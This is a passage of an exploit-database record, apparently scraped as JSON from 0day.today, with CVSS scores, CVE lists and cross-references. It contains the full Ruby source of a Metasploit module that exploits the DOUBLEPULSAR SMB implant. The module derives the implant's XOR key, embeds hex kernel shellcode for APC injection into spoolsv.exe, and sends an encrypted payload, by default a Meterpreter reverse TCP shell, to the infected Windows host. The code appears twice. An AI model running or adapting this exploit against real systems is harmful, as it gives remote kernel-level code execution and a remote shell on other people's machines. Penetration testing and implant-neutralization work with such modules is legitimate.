<<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90b8d0833fc6be46c6824f7750ed36c5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-11-14T11:47:36", "history": [{"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "1f2509ca21849136bc9b87bc7e0d7ed6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/33895", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-02-05T00:47:44", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:42031"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2020-02-05T00:47:44", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-02-05T00:47:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response 